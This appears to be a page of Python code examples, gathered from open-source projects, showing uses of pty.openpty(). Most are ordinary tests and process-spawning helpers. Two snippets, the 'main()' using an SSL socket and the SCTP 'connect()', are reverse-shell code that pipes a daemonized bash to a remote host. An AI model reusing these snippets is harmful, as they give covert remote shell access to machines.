我们从Python开源项目中,提取了以下49个代码示例,用于说明如何使用pty.openpty()。
def popen_tty(cmd): """Open a process with stdin connected to a pseudo-tty. Returns a :param cmd: command to run :type cmd: str :returns: (Popen, master) tuple, where master is the master side of the of the tty-pair. It is the responsibility of the caller to close the master fd, and to perform any cleanup (including waiting for completion) of the Popen object. :rtype: (Popen, int) """ import pty master, slave = pty.openpty() proc = subprocess.Popen(cmd, stdin=slave, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=os.setsid, close_fds=True, shell=True) os.close(slave) return (proc, master)
def test_signal_failure(monkeypatch): import os import pty import signal from pyrepl.unix_console import UnixConsole def failing_signal(a, b): raise ValueError def really_failing_signal(a, b): raise AssertionError mfd, sfd = pty.openpty() try: c = UnixConsole(sfd, sfd) c.prepare() c.restore() monkeypatch.setattr(signal, 'signal', failing_signal) c.prepare() monkeypatch.setattr(signal, 'signal', really_failing_signal) c.restore() finally: os.close(mfd) os.close(sfd)
def test_ioctl_signed_unsigned_code_param(self): if not pty: raise unittest.SkipTest('pty module required') mfd, sfd = pty.openpty() try: if termios.TIOCSWINSZ < 0: set_winsz_opcode_maybe_neg = termios.TIOCSWINSZ set_winsz_opcode_pos = termios.TIOCSWINSZ & 0xffffffff else: set_winsz_opcode_pos = termios.TIOCSWINSZ set_winsz_opcode_maybe_neg, = struct.unpack("i", struct.pack("I", termios.TIOCSWINSZ)) our_winsz = struct.pack("HHHH",80,25,0,0) # test both with a positive and potentially negative ioctl code new_winsz = fcntl.ioctl(mfd, set_winsz_opcode_pos, our_winsz) new_winsz = fcntl.ioctl(mfd, set_winsz_opcode_maybe_neg, our_winsz) finally: os.close(mfd) os.close(sfd)
def __init__(self): gr.sync_block.__init__(self, name="hdlc_to_ax25", in_sig=None, out_sig=None) (self.pty_master, self.pty_slave) = pty.openpty() tty = os.ttyname(self.pty_slave) if os.path.islink('/tmp/kiss_pty'): os.unlink('/tmp/kiss_pty') os.symlink(tty, '/tmp/kiss_pty') print 'KISS PTY is: /tmp/kiss_pty (%s)' % os.ttyname(self.pty_slave) self.message_port_register_in(pmt.intern('in')) self.set_msg_handler(pmt.intern('in'), self.handle_msg) self.count = 0 self.dropped = 0
def test_ioctl_signed_unsigned_code_param(self): if not pty: raise unittest.SkipTest('pty module required') mfd, sfd = pty.openpty() try: if termios.TIOCSWINSZ < 0: set_winsz_opcode_maybe_neg = termios.TIOCSWINSZ set_winsz_opcode_pos = termios.TIOCSWINSZ & 0xffffffffL else: set_winsz_opcode_pos = termios.TIOCSWINSZ set_winsz_opcode_maybe_neg, = struct.unpack("i", struct.pack("I", termios.TIOCSWINSZ)) our_winsz = struct.pack("HHHH",80,25,0,0) # test both with a positive and potentially negative ioctl code new_winsz = fcntl.ioctl(mfd, set_winsz_opcode_pos, our_winsz) new_winsz = fcntl.ioctl(mfd, set_winsz_opcode_maybe_neg, our_winsz) finally: os.close(mfd) os.close(sfd)
def _handles(stdin, stdout, stderr): master = None if stdout is PTY: # Normally we could just use subprocess.PIPE and be happy. # Unfortunately, this results in undesired behavior when # printf() and similar functions buffer data instead of # sending it directly. # # By opening a PTY for STDOUT, the libc routines will not # buffer any data on STDOUT. master, slave = pty.openpty() # By making STDOUT a PTY, the OS will attempt to interpret # terminal control codes. We don't want this, we want all # input passed exactly and perfectly to the process. tty.setraw(master) tty.setraw(slave) # Pick one side of the pty to pass to the child stdout = slave return stdin, stdout, stderr, master
def command_background_start(self, cmd): """Run a background command: run it in a new thread and resume execution immediately.""" self.printer.debug('[LOCAL CMD] Local Background Command: %s' % cmd) def daemon(cmd): """Daemon used to run the command so to avoid blocking the UI""" # Run command master, slave = pty.openpty() proc = subprocess.Popen(cmd, shell=True, stdout=slave, stderr=slave, close_fds=True) stdout = os.fdopen(master) self.printer.info("Monitoring in background...Kill this process when you want to see the dumped content") # Run command in a thread d = threading.Thread(name='daemon', target=daemon, args=(cmd,)) d.setDaemon(True) d.start() time.sleep(2)
def _do_it(self, action): master, slave = pty.openpty() p = subprocess.Popen(["ansible-connection"], stdin=slave, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdin = os.fdopen(master, 'wb', 0) os.close(slave) # Need to force a protocol that is compatible with both py2 and py3. # That would be protocol=2 or less. # Also need to force a protocol that excludes certain control chars as # stdin in this case is a pty and control chars will cause problems. # that means only protocol=0 will work. src = cPickle.dumps(self._play_context.serialize(), protocol=0) stdin.write(src) stdin.write(b'\n#END_INIT#\n') stdin.write(to_bytes(action)) stdin.write(b'\n\n') (stdout, stderr) = p.communicate() stdin.close() return (p.returncode, stdout, stderr)
def popen_tty(cmd): """Open a process with stdin connected to a pseudo-tty. Returns a :param cmd: command to run :type cmd: str :returns: (Popen, master) tuple, where master is the master side of the of the tty-pair. It is the responsibility of the caller to close the master fd, and to perform any cleanup (including waiting for completion) of the Popen object. :rtype: (Popen, int) """ master, slave = pty.openpty() proc = subprocess.Popen(cmd, stdin=slave, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=os.setsid, close_fds=True, shell=True) os.close(slave) return (proc, master)
def __init__(self, message_q): QThread.__init__(self) self.messages = message_q # Only the inferior process need use the slave file descriptor self.master, self.slave = pty.openpty() self.tty = os.ttyname(self.slave)
def getPty(self, term, windowSize, modes): self.environ['TERM'] = term self.winSize = windowSize self.modes = modes master, slave = pty.openpty() ttyname = os.ttyname(slave) self.environ['SSH_TTY'] = ttyname self.ptyTuple = (master, slave, ttyname)
def __init__(self): self._master, self._slave = pty.openpty() self._s_name = os.ttyname(self._slave) self._fake = Faker() self._fake_device = threading.Thread(target=self.__run)
def test_readline(): master, slave = pty.openpty() readline_wrapper = _ReadlineWrapper(slave, slave) os.write(master, b'input\n') result = readline_wrapper.get_reader().readline() assert result == b'input' assert isinstance(result, bytes_type)
def test_readline_returns_unicode(): master, slave = pty.openpty() readline_wrapper = _ReadlineWrapper(slave, slave) os.write(master, b'input\n') result = readline_wrapper.get_reader().readline(returns_unicode=True) assert result == 'input' assert isinstance(result, unicode_type)
def test_raw_input(): master, slave = pty.openpty() readline_wrapper = _ReadlineWrapper(slave, slave) os.write(master, b'input\n') result = readline_wrapper.raw_input('prompt:') assert result == b'input' assert isinstance(result, bytes_type)
def spawn(self, argv=None, term=None): if argv is None: if 'SHELL' in os.environ: argv = [os.environ['SHELL']] elif 'PATH' in os.environ: #searching sh in the path. It can be unusual like /system/bin/sh on android for shell in ["bash","sh","ksh","zsh","csh","ash"]: for path in os.environ['PATH'].split(':'): fullpath=os.path.join(path.strip(),shell) if os.path.isfile(fullpath): argv=[fullpath] break if argv: break if not argv: argv= ['/bin/sh'] if term is not None: os.environ['TERM']=term master, slave = pty.openpty() self.slave=slave self.master = os.fdopen(master, 'rb+wb', 0) # open file in an unbuffered mode flags = fcntl.fcntl(self.master, fcntl.F_GETFL) assert flags>=0 flags = fcntl.fcntl(self.master, fcntl.F_SETFL , flags | os.O_NONBLOCK) assert flags>=0 self.prog = subprocess.Popen( shell=False, args=argv, stdin=slave, stdout=slave, stderr=subprocess.STDOUT, preexec_fn=prepare )
def __init__(self, command=None, return_url=None, restart=False): self.command = command self.terminal_id = prism.generate_random_string(8) self.return_url = return_url self.restart = restart self.process = TerminalProcess(*pty.openpty()) logging.info('Terminal Opened: %s' % self.terminal_id)
def __init__(self, name): """If possible, connect to serial port""" # Try to establish connection to serial port try: self.serial_connection = serial.Serial(name, 9600) self.serial_connection_established = True # If it fails because there is no device, use virtual serial port except serial.SerialException: # Create virtual serial port self.master, self.slave = pty.openpty() self.vPort = os.ttyname(self.slave) # Create instance self.serial_connection = serial.Serial(self.vPort, 9600) self.serial_connection_established = True logging.warn("Trigger device not found -> Using virtual device") # Create events self.trigger_event = threading.Event() self.eventProgramEnd = threading.Event() # Store current time self.last_trigger_time = time.time() self.firstRun = True # Call initialization of thread class threading.Thread.__init__(self)
def make_slave_pty(): master_pty, slave_pty = pty.openpty() yield slave_pty os.close(slave_pty) os.close(master_pty)
def main(): s = establish_connection() if s is None: return -1 print success("Connection established!") daemonize() master, slave = pty.openpty() bash = subprocess.Popen(SHELL, preexec_fn=os.setsid, stdin=slave, stdout=slave, stderr=slave, universal_newlines=True) time.sleep(1) # Wait for bash to start before sending data to it. os.write(master, "%s\n" % FIRST_COMMAND) try: while bash.poll() is None: r, w, e = select.select([s, master], [], []) # SSLSockets don't play nice with select because they buffer data internally. # Code taken from https://stackoverflow.com/questions/3187565/select-and-ssl-in-python. if s in r: try: data = s.recv(1024) except ssl.SSLError as e: if e.errno == ssl.SSL_ERROR_WANT_READ: continue raise if not data: # End of file. break data_left = s.pending() while data_left: data += s.recv(data_left) data_left = s.pending() os.write(master, data) elif master in r: s.write(os.read(master, 2048)) finally: s.close()
def test_rip_error(request, tmpdir): """Test failed rips error handling. :param request: pytest fixture. :param py.path.local tmpdir: pytest fixture. """ # Duplicate ISO. iso = tmpdir.join('truncated.iso') py.path.local(__file__).dirpath().join('sample.iso').copy(iso) # Load the ISO. pytest.cdload(iso) # Execute. output = tmpdir.ensure_dir('output') command = ['docker', 'run', '--device=/dev/cdrom', '-v', '{}:/output'.format(output), '-e', 'DEBUG=true', 'robpol86/makemkv'] master, slave = pty.openpty() request.addfinalizer(lambda: [os.close(master), os.close(slave)]) proc = subprocess.Popen(command, bufsize=1, cwd=HERE, stderr=subprocess.STDOUT, stdin=slave, stdout=subprocess.PIPE) # Read output. caught = False while proc.poll() is None or proc.stdout.peek(1): for line in proc.stdout: # Watch for specific line, then truncate ISO. if b'Analyzing seamless segments' in line: iso.open('w').close() elif b'ERROR: One or more titles failed.' in line: caught = True print(line) # Write to stdout, pytest will print if test fails. # Verify. assert proc.poll() > 0 assert caught is True pytest.verify_failed_file(output)
def test_run_colored_output(self): file = os.path.join(self.wd, 'a.yaml') # Create a pseudo-TTY and redirect stdout to it master, slave = pty.openpty() sys.stdout = sys.stderr = os.fdopen(slave, 'w') with self.assertRaises(SystemExit) as ctx: cli.run((file, )) sys.stdout.flush() self.assertEqual(ctx.exception.code, 1) # Read output from TTY output = os.fdopen(master, 'r') flag = fcntl.fcntl(master, fcntl.F_GETFD) fcntl.fcntl(master, fcntl.F_SETFL, flag | os.O_NONBLOCK) out = output.read().replace('\r\n', '\n') sys.stdout.close() sys.stderr.close() output.close() self.assertEqual(out, ( '\033[4m%s\033[0m\n' ' \033[2m2:4\033[0m \033[31merror\033[0m ' 'trailing spaces \033[2m(trailing-spaces)\033[0m\n' ' \033[2m3:4\033[0m \033[31merror\033[0m ' 'no new line character at the end of file ' '\033[2m(new-line-at-end-of-file)\033[0m\n' '\n' % file))
def launch_textmode_app(self, executable, name): dialog = TextmodeDialog(name, self.w) self.app_executable = executable master_fd, slave_fd = pty.openpty() self.app_process = subprocess.Popen(str(executable), stdout=slave_fd, stderr=slave_fd) dialog.poll(self.app_process, master_fd) dialog.exec_() os.close(master_fd) os.close(slave_fd)
def __init__(self, hci_device_number=0, logger=None, events_config=None): self._logger = logger or logging.getLogger(__name__) self._event_parser = EventParser(config=events_config, logger=self._logger) self._agent_events_sender = AgentEventsSender(logger=self._logger) self._hci_device_number = hci_device_number try: subprocess.check_call(['hciconfig', self.hci_device_name, 'down']) except subprocess.CalledProcessError: self._logger.error('Could not run hciconfig down command for HCI device') raise self._hci_socket = create_bt_socket_hci_channel_user(hci_device_number) self._logger.info('bind to %s complete', self.hci_device_name) self._pty_master, pty_slave = pty.openpty() self._pty_fd = os.fdopen(self._pty_master, 'rwb') hci_tty = os.ttyname(pty_slave) self._logger.debug('TTY slave for the virtual HCI: %s', hci_tty) try: subprocess.check_call(['hciattach', hci_tty, 'any']) except subprocess.CalledProcessError: self._logger.error('Could not run hciattach on PTY device') raise self._inputs = [self._pty_fd, self._hci_socket] self._pty_buffer = StringIO() # Used as a seekable stream self._gatt_logger = GattLogger(self._logger) self._should_stop = False
def setUp(self): # Open PTY self.master, self.slave = pty.openpty()
def connect(host, port, disable_encryption = False): sock = sctp_socket(family = socket.AF_INET) sock.connect((host, port)) if disable_encryption: std_out = sock.sock().makefile("w") std_in = sock.sock().makefile() shell = Popen(os.environ["SHELL"], stdin = std_in, stdout = std_out, shell = True) else: ssl_sock = ssl.wrap_socket(sock.sock(), ssl_version = ssl.PROTOCOL_TLSv1) ssl_sock.send("Hi! This is the client. You're connected.\n") r, w = os.pipe() std_in = os.fdopen(r, "r") std_out = os.fdopen(w, "w") #Set our shell up to use pty, and make the output non-blocking. master, slave = pty.openpty() shell = Popen(os.environ["SHELL"], stdin = PIPE, stdout = slave, shell = True) shell.stdout = os.fdopen(os.dup(master), "r+") fd = shell.stdout.fileno() fl = fcntl.fcntl(fd, fcntl.F_GETFL) fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK) process_connection(ssl_sock, shell.stdin, shell.stdout, disable_encryption) sock.close()
def __start_proc(self): # for more information, pls refer : # http://rachid.koucha.free.fr/tech_corner/pty_pdip.html # open new pty master,slave = pty.openpty() # set to raw mode tty.setraw(master) tty.setraw(slave) # binding slave in to subprocess self.proc = Popen(self.elf_path, stdin=slave, stdout=slave, stderr=slave, close_fds=True, preexec_fn=self.preexec_fn, env=self.env, shell=True ) self.pid = self.proc.pid print('[+] Start pid : %d' % self.pid) # binding master to own controlled file descriptors self.proc.stdin = os.fdopen(os.dup(master),"r+") self.proc.stdout = os.fdopen(os.dup(master),"r+") self.proc.stderr = os.fdopen(os.dup(master),"r+") # close unnessesary file descriptor os.close(slave) os.close(master) # set non-blocking mode fd = self.proc.stdout.fileno() fl = fcntl.fcntl(fd, fcntl.F_GETFL) fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
def test_posix_printengine_tty(self): """Test POSIX print engine tty mode.""" sio = six.StringIO() def __drain(masterf): """Drain data from masterf and discard until eof.""" while True: chunksz = 1024 termdata = masterf.read(chunksz) if len(termdata) < chunksz: # assume we hit EOF break print(termdata, file=sio) # # - Allocate a pty # - Create a thread to drain off the master side; without # this, the slave side will block when trying to write. # - Connect the printengine to the slave side # - Set it running # (master, slave) = pty.openpty() slavef = os.fdopen(slave, "w") masterf = os.fdopen(master, "r") t = threading.Thread(target=__drain, args=(masterf,)) t.start() printengine.test_posix_printengine(slavef, True) slavef.close() t.join() masterf.close() self.assertTrue(len(sio.getvalue()) > 0)
def __t_pty_tracker(self, trackerclass, **kwargs): def __drain(masterf): while True: chunksz = 1024 termdata = masterf.read(chunksz) if len(termdata) < chunksz: # assume we hit EOF break # # - Allocate a pty # - Create a thread to drain off the master side; without # this, the slave side will block when trying to write. # - Connect the prog tracker to the slave side # - Set it running # (master, slave) = pty.openpty() slavef = os.fdopen(slave, "w") masterf = os.fdopen(master, "rb") t = threading.Thread(target=__drain, args=(masterf,)) t.start() p = trackerclass(output_file=slavef, **kwargs) progress.test_progress_tracker(p, gofast=True) slavef.close() t.join() masterf.close()
def startShell(self, mnopts=None): self.stop() args = ['docker', 'run', '-ti', '--rm', '--privileged=true'] args.extend(['--hostname=' + self.name, '--name=' + self.name]) args.extend(['-e', 'DISPLAY']) args.extend(['-v', '/tmp/.X11-unix:/tmp/.X11-unix:ro']) print self.port_map if self.port_map is not None: for p in self.port_map: args.extend(['-p', '%d:%d' % (p[0], p[1])]) if self.fs_map is not None: for f in self.fs_map: args.extend(['-v', '%s:%s' % (f[0], f[1])]) args.extend([self.docker_image]) master, slave = pty.openpty() self.shell = subprocess.Popen( args, stdin=slave, stdout=slave, stderr=slave, close_fds=True, preexec_fn=os.setpgrp) os.close(slave) ttyobj = os.fdopen(master, 'rw') self.stdin = ttyobj self.stdout = ttyobj self.pid = self.shell.pid self.pollOut = select.poll() self.pollOut.register(self.stdout) self.outToNode[self.stdout.fileno()] = self self.inToNode[self.stdin.fileno()] = self self.execed = False self.lastCmd = None self.lastPid = None self.readbuf = '' self.waiting = False # Wait for prompt time.sleep(1) pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'', self.name] pidp = subprocess.Popen( pid_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=False) pidp.wait() ps_out = pidp.stdout.readlines() self.pid = int(ps_out[0]) self.cmd('export PS1=\"\\177\"; printf "\\177"') self.cmd('stty -echo; set +m')
def run(command=None, args=None, output=None, image_id=None, environ=None, cwd=None): """Run a command and return the output. Supports string and py.path paths. :raise CalledProcessError: Command exits non-zero. :param iter command: Command to run. :param iter args: List of command line arguments to insert to command. :param str output: Path to bind mount to /output when `command` is None. :param str image_id: Docker image to use instead of robpol86/makemkv. :param dict environ: Environment variables to set/override in the command. :param str cwd: Current working directory. Default is tests directory. :return: Command stdout and stderr output. :rtype: tuple """ if command is None: command = ['docker', 'run', '--device=/dev/cdrom', '-e', 'DEBUG=true', image_id or 'robpol86/makemkv'] if output: command = command[:-1] + ['-v', '{}:/output'.format(output)] + command[-1:] if args: command = command[:-1] + list(args) + command[-1:] env = os.environ.copy() if environ: env.update(environ) # Simulate stdin pty so 'docker run -it' doesn't complain. if command[0] in ('bash', 'docker'): master, slave = pty.openpty() else: master, slave = 0, 0 # Determine timeout. if command[0] in ('docker',): timeout = 120 else: timeout = 30 # Run command. try: result = subprocess.run( [str(i) for i in command], check=True, cwd=cwd or HERE, env=env, stderr=subprocess.PIPE, stdin=slave or None, stdout=subprocess.PIPE, timeout=timeout ) finally: if slave: os.close(slave) if master: os.close(master) return result.stdout, result.stderr
def runShell(script, env=None, cwd="/", user=None, base64_encode=False): # check script import pwd, grp import pty if not script: return 0, "" try: # base64 decode if base64_encode: decode_script = base64.decodestring(script) else: decode_script = script # check user logger.info(decode_script) cur_user = pwd.getpwuid(os.getuid())[0] if not user or user == cur_user: shell_list = ["bash", "-c", decode_script.encode('utf8')] else: shell_list = ["su", user, "-c", decode_script.encode('utf8'), "-s", "/bin/bash"] master_fd, slave_fd = pty.openpty() proc = Popen(shell_list, shell=False, universal_newlines=True, bufsize=1, stdout=slave_fd, stderr=STDOUT, env=env, cwd=cwd, close_fds=True) except Exception, e: logger.error(e) return (1, str(e)) timeout = .1 outputs = '' while True: try: ready, _, _ = gs.select([master_fd], [], [], timeout) except gs.error as ex: if ex[0] == 4: continue else: raise if ready: data = os.read(master_fd, 512) outputs += data if not data: break elif proc.poll() is not None: break os.close(slave_fd) os.close(master_fd) proc.wait() status = proc.returncode return (status, outputs)
def __init__(self, reactor, executable, args, environment, path, proto, uid=None, gid=None, usePTY=None): """ Spawn an operating-system process. This is where the hard work of disconnecting all currently open files / forking / executing the new process happens. (This is executed automatically when a Process is instantiated.) This will also run the subprocess as a given user ID and group ID, if specified. (Implementation Note: this doesn't support all the arcane nuances of setXXuid on UNIX: it will assume that either your effective or real UID is 0.) """ if pty is None and not isinstance(usePTY, (tuple, list)): # no pty module and we didn't get a pty to use raise NotImplementedError( "cannot use PTYProcess on platforms without the pty module.") abstract.FileDescriptor.__init__(self, reactor) _BaseProcess.__init__(self, proto) if isinstance(usePTY, (tuple, list)): masterfd, slavefd, _ = usePTY else: masterfd, slavefd = pty.openpty() try: self._fork(path, uid, gid, executable, args, environment, masterfd=masterfd, slavefd=slavefd) except: if not isinstance(usePTY, (tuple, list)): os.close(masterfd) os.close(slavefd) raise # we are now in parent process: os.close(slavefd) fdesc.setNonBlocking(masterfd) self.fd = masterfd self.startReading() self.connected = 1 self.status = -1 try: self.proto.makeConnection(self) except: log.err() registerReapProcessHandler(self.pid, self)
def _setupChild(self, masterfd, slavefd): """ Set up child process after C{fork()} but before C{exec()}. This involves: - closing C{masterfd}, since it is not used in the subprocess - creating a new session with C{os.setsid} - changing the controlling terminal of the process (and the new session) to point at C{slavefd} - duplicating C{slavefd} to standard input, output, and error - closing all other open file descriptors (according to L{_listOpenFDs}) - re-setting all signal handlers to C{SIG_DFL} @param masterfd: The master end of a PTY file descriptors opened with C{openpty}. @type masterfd: L{int} @param slavefd: The slave end of a PTY opened with C{openpty}. @type slavefd: L{int} """ os.close(masterfd) os.setsid() fcntl.ioctl(slavefd, termios.TIOCSCTTY, '') for fd in range(3): if fd != slavefd: os.close(fd) os.dup2(slavefd, 0) # stdin os.dup2(slavefd, 1) # stdout os.dup2(slavefd, 2) # stderr for fd in _listOpenFDs(): if fd > 2: try: os.close(fd) except: pass self._resetSignalDisposition()
def _execute_process_pty(cmd, cwd, env, shell, stderr_to_stdout=True): stdout_master, stdout_slave = None, None stderr_master, stderr_slave = None, None fds_to_close = [stdout_master, stdout_slave, stderr_master, stderr_slave] try: stdout_master, stdout_slave = pty.openpty() if stderr_to_stdout: stderr_master, stderr_slave = stdout_master, stdout_slave else: stderr_master, stderr_slave = pty.openpty() p = None while p is None: try: p = Popen( cmd, stdin=stdout_slave, stdout=stderr_slave, stderr=STDOUT, cwd=cwd, env=env, shell=shell, close_fds=False) except OSError as exc: # This can happen if a file you are trying to execute is being # written to simultaneously on Linux # (doesn't appear to happen on OS X) # It seems like the best strategy is to just try again later # Worst case is that the file eventually gets deleted, then a # different OSError would occur. if 'Text file busy' in '{0}'.format(exc): # This is a transient error, try again shortly time.sleep(0.01) continue raise # This causes the below select to exit when the subprocess closes. # On Linux, this sometimes causes Errno 5 OSError's when os.read # is called from within _yield_data, so on Linux _yield_data # catches and passes on that particular OSError. os.close(stdout_slave) if not stderr_to_stdout: os.close(stderr_slave) left_overs = {stdout_master: b'', stderr_master: b''} fds = [stdout_master] if stderr_master != stdout_master: fds.append(stderr_master) finally: # Make sure we don't leak file descriptors _close_fds(fds_to_close) # The linesep with pty's always seems to be "\r\n", even on OS X return _yield_data(p, fds, left_overs, "\r\n", fds_to_close)
def startShell( self, mnopts=None ): "Start a shell process for running commands" if self.shell: error( "%s: shell is already running\n" % self.name ) return # mnexec: (c)lose descriptors, (d)etach from tty, # (p)rint pid, and run in (n)amespace opts = '-cd' if mnopts is None else mnopts if self.inNamespace: opts += 'n' # bash -i: force interactive # -s: pass $* to shell, and make process easy to find in ps # prompt is set to sentinel chr( 127 ) cmd = [ 'mnexec', opts, 'env', 'PS1=' + chr( 127 ), 'bash', '--norc', '-is', 'mininet:' + self.name ] # Spawn a shell subprocess in a pseudo-tty, to disable buffering # in the subprocess and insulate it from signals (e.g. SIGINT) # received by the parent master, slave = pty.openpty() self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave, close_fds=False ) self.stdin = os.fdopen( master, 'rw' ) self.stdout = self.stdin self.pid = self.shell.pid self.pollOut = select.poll() self.pollOut.register( self.stdout ) # Maintain mapping between file descriptors and nodes # This is useful for monitoring multiple nodes # using select.poll() self.outToNode[ self.stdout.fileno() ] = self self.inToNode[ self.stdin.fileno() ] = self self.execed = False self.lastCmd = None self.lastPid = None self.readbuf = '' # Wait for prompt while True: data = self.read( 1024 ) if data[ -1 ] == chr( 127 ): break self.pollOut.poll() self.waiting = False # +m: disable job control notification self.cmd( 'unset HISTFILE; stty -echo; set +m' )
def startShell( self, *args, **kwargs ): "Start a shell process for running commands" if self.shell: error( "%s: shell is already running\n" % self.name ) return # mnexec: (c)lose descriptors, (d)etach from tty, # (p)rint pid, and run in (n)amespace # opts = '-cd' if mnopts is None else mnopts # if self.inNamespace: # opts += 'n' # bash -i: force interactive # -s: pass $* to shell, and make process easy to find in ps # prompt is set to sentinel chr( 127 ) cmd = [ 'docker', 'exec', '-it', '%s.%s' % ( self.dnameprefix, self.name ), 'env', 'PS1=' + chr( 127 ), 'bash', '--norc', '-is', 'mininet:' + self.name ] # Spawn a shell subprocess in a pseudo-tty, to disable buffering # in the subprocess and insulate it from signals (e.g. SIGINT) # received by the parent master, slave = pty.openpty() self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave, close_fds=False ) self.stdin = os.fdopen( master, 'rw' ) self.stdout = self.stdin self.pid = self._get_pid() self.pollOut = select.poll() self.pollOut.register( self.stdout ) # Maintain mapping between file descriptors and nodes # This is useful for monitoring multiple nodes # using select.poll() self.outToNode[ self.stdout.fileno() ] = self self.inToNode[ self.stdin.fileno() ] = self self.execed = False self.lastCmd = None self.lastPid = None self.readbuf = '' # Wait for prompt while True: data = self.read( 1024 ) if data[ -1 ] == chr( 127 ): break self.pollOut.poll() self.waiting = False # +m: disable job control notification self.cmd( 'unset HISTFILE; stty -echo; set +m' )